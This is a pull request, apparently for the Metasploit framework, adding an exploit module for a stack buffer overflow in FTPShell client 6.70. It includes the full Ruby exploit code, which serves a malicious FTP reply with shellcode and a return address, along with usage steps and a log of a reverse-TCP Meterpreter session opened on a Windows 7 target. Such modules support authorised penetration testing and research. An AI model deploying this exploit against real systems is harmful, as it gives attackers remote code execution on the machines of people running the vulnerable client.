### PR TITLE
FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow

### DIFF
--- a/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md
+++ b/documentation/modules/exploit/windows/ftp/ftpshell_cli_bof.md
@@ -1,0 +1,54 @@
+## Vulnerable Application
+
+FTPShell client 6.70 (Enterprise edition) is affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code on the target. The vulnerability is caused by improper bounds checking of the PWD command. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [ftpshell.com](http://www.ftpshell.com/downloadclient.htm).
+
+## Verification Steps
+    1. Install a vulnerable FTPShell client 6.70
+    2. Start `msfconsole`
+    3. Do `use exploit/windows/ftp/ftpshell_cli_bof`
+    4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+    5. Do `set LHOST ip`
+    6. Do `exploit`
+    7. Conect to the FTP server using FTPShell client 6.70
+    8. Verify the Meterpreter session is opened
+
+## Scenarios
+
+### FTPShell client 6.70 on Windows 7 SP1 x64
+
+```
+msf > use exploit/windows/ftp/ftpshell_cli_bof 
+msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 
+LHOST => 172.16.106.129
+msf exploit(windows/ftp/ftpshell_cli_bof) > exploit 
+[*] Exploit running as background job 0.
+
+[*] Started reverse TCP handler on 172.16.106.129:4444 
+[*] Please ask your target(s) to connect to 172.16.106.129:21
+[*] Server started.
+msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.
+[*] 172.16.106.128 - Response: Sending 220 Welcome
+[*] 172.16.106.128 - Request: USER anonymous
+[*] 172.16.106.128 - Response: sending 331 OK
+[*] 172.16.106.128 - Request: PASS anonymous@anon.com
+[*] 172.16.106.128 - Response: Sending 230 OK
+[*] 172.16.106.128 - Request: PWD
+[*] 172.16.106.128 - Request: Sending the malicious response
+[*] Sending stage (179779 bytes) to 172.16.106.128
+[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400
+
+msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer        : PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -7,8 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::TcpServer
-  include Msf::Exploit::Seh
-  include Msf::Exploit::Remote::Egghunter
 
   def initialize(info = {})
     super(update_info(info,
@@ -68,7 +66,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_client_connect(client)
-    return if ((p = regenerate_payload(client)) == nil)
+    p = regenerate_payload(client)
+    return if p.nil?
     print_status("#{client.peerhost} - connected.")
 
     res = client.get_once.to_s.strip
@@ -93,9 +92,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     sploit = '220 "'
     sploit << payload.encoded
-    sploit << '\x20' * (payload_space - payload.encoded.length)
+    sploit << "\x20" * (payload_space - payload.encoded.length)
     sploit << target.ret
-    sploit << '" is current directory\r\n'
+    sploit << "\" is current directory\r\n"
 
     print_status("#{client.peerhost} - Request: Sending the malicious response")
     client.put(sploit)

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -14,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
       'Description'    => %q{
-          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
-          code execution.
+          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
+          edition) allowing remote code execution.
         },
       'Author'   =>
         [
-          'r4wd3r',                                            # Original exploit author
-          'Daniel Teixeira <danieljcrteixeira[at]gmail.com>'   # MSF module author
+          'r4wd3r',           # Original exploit author
+          'Daniel Teixeira'   # MSF module author
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -45,13 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
           'SRVHOST' => '0.0.0.0',
           'EXITFUNC' => 'thread'
         },
-      'DisclosureDate' => 'May 15 2017',
+      'DisclosureDate' => 'March 4 2017',
       'DefaultTarget'  => 0))
 
-    register_options(
-      [
-        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
-      ])
+    register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
   end
 
   def exploit
@@ -94,11 +91,11 @@ class MetasploitModule < Msf::Exploit::Remote
     res = client.get_once.to_s.strip
     print_status("#{client.peerhost} - Request: #{res}")
 
-    sploit = "220 \""
+    sploit = '220 "'
     sploit << payload.encoded
-    sploit << "\x20"*(400-payload.encoded.length)
+    sploit << '\x20' * (payload_space - payload.encoded.length)
     sploit << target.ret
-    sploit << "\" is current directory\r\n"
+    sploit << '" is current directory\r\n'
 
     print_status("#{client.peerhost} - Request: Sending the malicious response")
     client.put(sploit)

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'SRVHOST' => '0.0.0.0',
           'EXITFUNC' => 'thread'
         },
-      'DisclosureDate' => 'March 4 2017',
+      'DisclosureDate' => 'Mar 4 2017',
       'DefaultTarget'  => 0))
 
     register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'CVE', 'CVE-2018-7573'],
+          [ 'CVE', '2018-7573'],
           [ 'EDB', '44596' ]
         ],
       'Payload'        =>
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{client.peerhost} - Request: #{res}")
 
     sploit = "220 \""
-    sploit << payload.encoded 
+    sploit << payload.encoded
     sploit << "\x20"*(400-payload.encoded.length)
     sploit << target.ret
     sploit << "\" is current directory\r\n"

--- a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Seh
+  include Msf::Exploit::Remote::Egghunter
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
+          code execution.
+        },
+      'Author'   =>
+        [
+          'r4wd3r',                                            # Original exploit author
+          'Daniel Teixeira <danieljcrteixeira[at]gmail.com>'   # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', 'CVE-2018-7573'],
+          [ 'EDB', '44596' ]
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 400,
+          'BadChars' => "\x00\x22\x0d\x0a\x0b"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # CALL ESI in FTPShell.exe : 0x00452eed
+          [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' =>
+        {
+          'SRVHOST' => '0.0.0.0',
+          'EXITFUNC' => 'thread'
+        },
+      'DisclosureDate' => 'May 15 2017',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
+      ])
+  end
+
+  def exploit
+    srv_ip_for_client = datastore['SRVHOST']
+    if srv_ip_for_client == '0.0.0.0'
+      if datastore['LHOST']
+        srv_ip_for_client = datastore['LHOST']
+      else
+        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
+      end
+    end
+
+    srv_port = datastore['SRVPORT']
+
+    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
+    super
+  end
+
+  def on_client_connect(client)
+    return if ((p = regenerate_payload(client)) == nil)
+    print_status("#{client.peerhost} - connected.")
+
+    res = client.get_once.to_s.strip
+    print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
+    print_status("#{client.peerhost} - Response: Sending 220 Welcome")
+    welcome = "220 Welcome.\r\n"
+    client.put(welcome)
+
+    res = client.get_once.to_s.strip
+    print_status("#{client.peerhost} - Request: #{res}")
+    print_status("#{client.peerhost} - Response: sending 331 OK")
+    user = "331 OK.\r\n"
+    client.put(user)
+
+    res = client.get_once.to_s.strip
+    print_status("#{client.peerhost} - Request: #{res}")
+    print_status("#{client.peerhost} - Response: Sending 230 OK")
+    pass = "230 OK.\r\n"
+    client.put(pass)
+    res = client.get_once.to_s.strip
+    print_status("#{client.peerhost} - Request: #{res}")
+
+    sploit = "220 \""
+    sploit << payload.encoded 
+    sploit << "\x20"*(400-payload.encoded.length)
+    sploit << target.ret
+    sploit << "\" is current directory\r\n"
+
+    print_status("#{client.peerhost} - Request: Sending the malicious response")
+    client.put(sploit)
+
+  end
+end


### PR DESCRIPTION
This PR adds a module to exploit a remote buffer overflow in the FTPShell client 6.70.

Tested on: Windows 7 Enterprise SP1 x64

## Verification

List the steps needed to make sure this thing works

- [ ] Install the application
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/ftp/labf_nfsaxe`
- [ ] Set the payload
- [ ] Exploit
- [ ] Connect to the FTP server using the FTP client
- [ ] Get a session

## Example

```
msf > use exploit/windows/ftp/ftpshell_cli_bof 
msf exploit(windows/ftp/ftpshell_cli_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(windows/ftp/ftpshell_cli_bof) > set LHOST 172.16.106.129 
LHOST => 172.16.106.129
msf exploit(windows/ftp/ftpshell_cli_bof) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.106.129:4444 
[*] Please ask your target(s) to connect to 172.16.106.129:21
[*] Server started.
msf exploit(windows/ftp/ftpshell_cli_bof) > [*] 172.16.106.128 - connected.
[*] 172.16.106.128 - Response: Sending 220 Welcome
[*] 172.16.106.128 - Request: USER anonymous
[*] 172.16.106.128 - Response: sending 331 OK
[*] 172.16.106.128 - Request: PASS anonymous@anon.com
[*] 172.16.106.128 - Response: Sending 230 OK
[*] 172.16.106.128 - Request: PWD
[*] 172.16.106.128 - Request: Sending the malicious response
[*] Sending stage (179779 bytes) to 172.16.106.128
[*] Meterpreter session 1 opened (172.16.106.129:4444 -> 172.16.106.128:49263) at 2018-06-27 11:19:38 -0400

msf exploit(windows/ftp/ftpshell_cli_bof) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
```